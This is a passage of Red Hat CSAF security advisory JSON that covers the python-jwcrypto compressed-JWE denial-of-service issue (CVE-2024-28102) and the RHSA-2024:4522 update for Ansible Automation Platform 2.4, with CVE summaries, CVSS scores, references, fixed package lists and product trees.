"discovery_date": "2024-03-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2268758"
}
],
"notes": [
{
"category": "description",
"text": "An uncontrolled resource consumption vulnerability was found in python-jwcrypto. If a malicious JWE token with a high compression ratio is passed to the server, the server will consume a lot of memory and processing time, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-jwcrypto: malicious JWE token can cause denial of service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The CVE-2024-28102 vulnerability in JWCrypto represents a moderate severity issue due to its potential impact on system availability and resource consumption. While the vulnerability allows for a denial of service (DoS) attack, it requires an attacker to craft a malicious JWE Token with a high compression ratio. This specific condition limits the practical exploitability of the vulnerability to some extent, as it demands a more sophisticated attack approach than common vulnerabilities. Nonetheless, if exploited, the vulnerability can lead to significant memory exhaustion and increased server processing time, impacting the overall performance and availability of the affected system.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-28102"
},
{
"category": "external",
"summary": "RHBZ#2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-28102",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28102"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f",
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
}
],
"release_date": "2024-03-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-04-30T13:36:16+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:2559"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-jwcrypto: malicious JWE token can cause denial of service"
}
]
}
rhsa-2024_4522
Vulnerability from csaf_redhat
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat Ansible Automation Platform 2.4\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.\n\nSecurity Fix(es):\n\n* automation-controller: jinja2: accepts keys containing non-attribute characters (CVE-2024-34064)\n* automation-controller: jwcrypto: malicious JWE token can cause denial of service (CVE-2024-28102)\n* automation-controller: requests: subsequent requests to the same host ignore cert verification (CVE-2024-35195)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nUpdates and fixes for automation controller:\n* Fixed a bug where the controller does not respect \"DATABASES[\u2018OPTIONS\u2019]\" setting, if specified (AAP-26398)\n* Changed all uses of \"ImplicitRoleField\" to perform an \"on_delete=SET_NULL\" (AAP-25136)\n* Fixed the HostMetric automated counter to display the correct values (AAP-25115)\n* Added Django logout redirects (AAP-24543)\n* automation-controller has been updated to 4.5.8\n\nAdditional changes:\n* aap-metrics-utility has been updated to 0.3.0 (AAP-25875)\n* ansible-core has been updated to 2.15.12 (AAP-25536)",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:4522",
"url": "https://access.redhat.com/errata/RHSA-2024:4522"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "2279476",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2279476"
},
{
"category": "external",
"summary": "2282114",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2282114"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_4522.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.4 Product Security and Bug Fix Update",
"tracking": {
"current_release_date": "2025-01-06T18:58:53+00:00",
"generator": {
"date": "2025-01-06T18:58:53+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.5"
}
},
"id": "RHSA-2024:4522",
"initial_release_date": "2024-07-12T01:43:40+00:00",
"revision_history": [
{
"date": "2024-07-12T01:43:40+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-07-12T01:43:40+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-01-06T18:58:53+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.4::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_inside:2.4::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_developer:2.4::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.4::el8"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_inside:2.4::el8"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_developer:2.4::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat Ansible Automation Platform"
},
{
"branches": [
{
"category": "product_version",
"name": "ansible-core-1:2.15.12-1.el9ap.src",
"product": {
"name": "ansible-core-1:2.15.12-1.el9ap.src",
"product_id": "ansible-core-1:2.15.12-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.15.12-1.el9ap?arch=src\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.src",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.src",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.src",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.src",
"product_id": "automation-controller-0:4.5.8-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "ansible-core-1:2.15.12-1.el8ap.src",
"product": {
"name": "ansible-core-1:2.15.12-1.el8ap.src",
"product_id": "ansible-core-1:2.15.12-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.15.12-1.el8ap?arch=src\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.src",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.src",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.src",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.src",
"product_id": "automation-controller-0:4.5.8-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "ansible-core-1:2.15.12-1.el9ap.noarch",
"product": {
"name": "ansible-core-1:2.15.12-1.el9ap.noarch",
"product_id": "ansible-core-1:2.15.12-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.15.12-1.el9ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "ansible-test-1:2.15.12-1.el9ap.noarch",
"product": {
"name": "ansible-test-1:2.15.12-1.el9ap.noarch",
"product_id": "ansible-test-1:2.15.12-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-test@2.15.12-1.el9ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"product": {
"name": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"product_id": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-cli@4.5.8-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"product": {
"name": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"product_id": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-server@4.5.8-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"product": {
"name": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"product_id": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-ui@4.5.8-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ansible-core-1:2.15.12-1.el8ap.noarch",
"product": {
"name": "ansible-core-1:2.15.12-1.el8ap.noarch",
"product_id": "ansible-core-1:2.15.12-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.15.12-1.el8ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "ansible-test-1:2.15.12-1.el8ap.noarch",
"product": {
"name": "ansible-test-1:2.15.12-1.el8ap.noarch",
"product_id": "ansible-test-1:2.15.12-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-test@2.15.12-1.el8ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"product": {
"name": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"product_id": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-cli@4.5.8-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"product": {
"name": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"product_id": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-server@4.5.8-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"product": {
"name": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"product_id": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-ui@4.5.8-1.el8ap?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"product_id": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"product_id": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el8ap?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"product_id": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"product_id": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el8ap?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.s390x",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.s390x",
"product_id": "automation-controller-0:4.5.8-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.s390x",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.s390x",
"product_id": "automation-controller-0:4.5.8-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el8ap?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"product_id": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"product_id": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el8ap?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
